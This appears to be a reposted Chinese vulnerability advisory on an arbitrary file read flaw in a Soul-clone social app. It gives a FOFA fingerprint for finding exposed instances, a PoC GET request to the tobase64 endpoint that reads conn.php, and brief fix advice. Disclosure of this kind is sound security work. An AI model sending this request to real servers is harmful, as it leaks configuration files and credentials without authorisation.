当前位置: 首页 > news >正文

某仿soul欲音社交系统存在任意文件读取漏洞

1 阅读须知


        技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

2 产品概述

        仿soul欲音社交系统控制器中的tobase64 方法通过传入file参数 然后通过fopen直接读取任意文件,然后输出base64编码后的文件。

3 漏洞描述


        任意文件读取漏洞(Arbitrary File Read Vulnerability)是指攻击者可以通过web应用程序读取服务器上的任意文件,而不受访问控制限制的漏洞。这种漏洞通常是由于应用程序对用户输入的验证不足、权限配置不当或代码实现缺陷所导致的。 

fofa

"/public/style/admin/js/jquery.min.js"

4.漏洞复现 

 poc

GET /api/upload/tobase64?file=conn.php HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36

 

5 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

 

 


http://www.mrgr.cn/news/24716.html

相关文章:

  • PyTorch 和 TensorFlow
  • 软件测试认知篇
  • 实战02-TabBar
  • redis数据类型
  • table用position: sticky固定多层表头,滑动滚动条border边框透明解决方法
  • 横版闯关手游【全明星时空阿拉德】Linux手工服务端+运营后台+双app端
  • R语言数据整理和分析(1)
  • ARM base instruction -- blr
  • golang的GC(三色标记法+混合写屏障)学习笔记
  • 【PyTorch单点知识】torch.nn.Embedding模块介绍:理解词向量与实现
  • 438. 找到字符串中所有字母异位词
  • crdownload格式后缀的文件是什么东西?crdownload格式是什么
  • 秋招面经9.11
  • 智能优化算法-鼠群优化算法(RSO)(附源码)
  • Vue3: Node安装下载
  • 哈希表(功能不太全,只能查找)
  • 喜报 速程精密牵头编制团体标准《ZR机械手通用技术要求》正式发布
  • 【验证问题记录-001】后仿中无复位寄存器的初始化问题
  • Adobe Acrobat DC无法将图片转换成PDF?教你用Python快速解决,最后附上集成小程序!
  • go时间处理